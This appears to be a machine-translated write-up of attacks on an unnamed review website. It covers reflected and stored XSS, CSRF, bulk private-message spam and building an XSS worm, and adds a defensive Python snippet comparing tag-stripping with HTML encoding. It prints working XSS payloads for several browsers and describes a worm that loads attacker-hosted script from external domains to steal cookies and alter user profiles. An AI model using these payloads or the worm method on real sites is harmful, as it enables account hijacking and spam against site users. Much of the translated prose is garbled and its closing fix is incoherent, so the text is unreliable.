Notes on a review website's vulnerabilities, and a walkthrough of how XSS worms are written

Source: Internet
Author: User

This article analyzes several vulnerabilities on the main site, gives exploitation scenarios for each, and finally walks through a simple XSS worm for a review website that still has cross-site problems: stored XSS, reflected XSS, cookies set without HttpOnly, and CSRF with no defence at all.

1. First, a few reflected XSS instances. On most websites these do little harm, but here the comments are essentially unprotected against cross-site attacks, and on top of that private messages can be sent in bulk. Combined with Google's short-link service, the reflected XSS becomes far more harmful: stealing cookies, modifying user information, leaving backdoors, and posting comments at will (for the concrete usage see the reflected variant of the worm script below). In Firefox `"/><script>alert(/1/)</script>` works directly; the IE 0day payload is `id => <div/id = x> x </div> <xml: namespace prefix = t> <import namespace = t implementation = % 23 default % 23time2> <t: set/attributename = inner HTML targetElement = x to = % 26lt; img % 26% 2311; src = x: x % 26% 2311; onerror % 26%; = alert % 2311 23x28; document. cookie % 26% 23x29; % 26gt;>`; in Chrome `"><svg><script xlink:href=//*********></script>`. There are many more reflected instances, a scanner will find a pile of them, and that is without counting DOM XSS, so a few examples suffice.

2. For sending private messages in bulk, look at the post interface: with Burp or a small script, parameterize `targetName`. Its value is the user name, which can be collected in bulk and reused indefinitely; the interface can then push small ads and malicious links in bulk, for example "This food store is good, please check the link".

3. Speaking of private messages, there is also the matter of a CSRF stored in a private message to obtain cookies.
On the surface the private message content is filtered, but the input name is not. A stored XSS still cannot be formed from it, but CSRF can be used to construct a POST-based reflected XSS. The following CSRF script shows its result in the pop-up box. Hosting it on your own shell site is a good choice, for example,
4. Check whether there are automatic comments. Compared with that function, this is highly risky for reviews; it's a trivial matter to refresh others.

5. Having covered the reflected kind, on to the stored XSS itself. As the worm section will also show, this area filters out `<script>` but does not filter `<frame>`. I don't know whether the JS development is simply weak, but `'"<>` should be filtered here as it is elsewhere.

6. Then there is blind XSS; just look at the figure.
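As an added defensive example (not code from the article), the following contrasts a hypothetical reconstruction of the weak "strip `<script>` only" filter described above with context-aware output encoding, and checks a Set-Cookie header for the HttpOnly flag whose absence the article says lets injected script read `document.cookie`. The sample inputs are constructed to match the payload shapes the article lists; `example.invalid` is a placeholder host.

```python
import html
import re

# Hypothetical reconstruction of the filter the article describes: it removes
# <script> tags and nothing else. Constructed here only to show why it fails.
SCRIPT_TAG = re.compile(r"</?script\b[^>]*>", re.IGNORECASE)
# Characters that can open a tag or break out of a quoted attribute.
MARKUP_CHARS = re.compile(r"""[<>"']""")


def blocklist_filter(user_input: str) -> str:
    """Weak setting: strip <script> tags only, leave every other tag intact."""
    return SCRIPT_TAG.sub("", user_input)


def encode_for_html(user_input: str) -> str:
    """Hardened setting: encode & < > " ' so input renders as text, never markup."""
    return html.escape(user_input, quote=True)


def is_inert(fragment: str) -> bool:
    """True when the fragment can neither open a tag nor escape an attribute."""
    return MARKUP_CHARS.search(fragment) is None


# Constructed samples shaped like the payload classes named in the article.
SAMPLES = [
    '"/><script>alert(/1/)</script>',                         # attribute breakout plus script
    '"><svg><script xlink:href=//example.invalid></script>',  # svg wrapper with external script
    '<frame src=//example.invalid>',                          # the tag the article says is not filtered
]


def compare_filters(samples=SAMPLES):
    """Map each sample to (blocklist leaves it inert?, encoder leaves it inert?)."""
    return {s: (is_inert(blocklist_filter(s)), is_inert(encode_for_html(s))) for s in samples}


def missing_cookie_flags(set_cookie_header: str):
    """Return the hardening attributes absent from a Set-Cookie header value."""
    attrs = {part.strip().split("=", 1)[0].lower() for part in set_cookie_header.split(";")[1:]}
    return [flag for flag in ("httponly", "secure", "samesite") if flag not in attrs]


if __name__ == "__main__":
    for sample, (blocked, encoded) in compare_filters().items():
        print(f"{sample!r}: blocklist inert={blocked}, encoded inert={encoded}")
    print(missing_cookie_flags("SESSIONID=abc123; Path=/"))
```

Every sample passes the blocklist still carrying live markup, while the encoded form is inert in all three cases; a session cookie set without HttpOnly is exactly what the cookie-theft payloads above rely on.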
The following focuses on the worm, which uses the parking information in comments. First, note that even when CSRF is defended against with both a Referer check and a token, the Referer check is useless because it is JS running on the website itself that makes the call, and the token can generally be read through JS (see the Sina worm for an example). I did not write that part of the code because I had no token. Let's look at the results. Because I did not dare to test it directly, I first wrote the XSS worm as a CSRF. The code is as follows; it calls the xss.js written by sogili.
Since I had just been testing the CSRF, I used the pseudo-AJAX method x.najax. The CSRF attempt without AJAX failed, presumably because cross-origin requests are restricted, and every website's settings differ. The advantage of x.najax is that it can be used off-site as well as on-site; take a good look at http://mmme.me/xss.js. Click Next to see the detailed code, which I won't post; the JS call address is http://xsser.me/zJ5sSA? 1358 *. Since I did not directly use the worm address's parking information in the script, we can also test whether the worm code was written successfully. 4. JS call successful. 5. Check whether the request is executed.

A few more results can be seen, and the worm can be found: the personal information page has been changed. That concludes the use of the worm. The example is very simple. It is good that the vendor automatically blocks reviews, but some comments without the worm are not blocked automatically either, and sometimes not every comment carrying the worm is blocked. Solution:

I think it is a serious one-to-one solution.
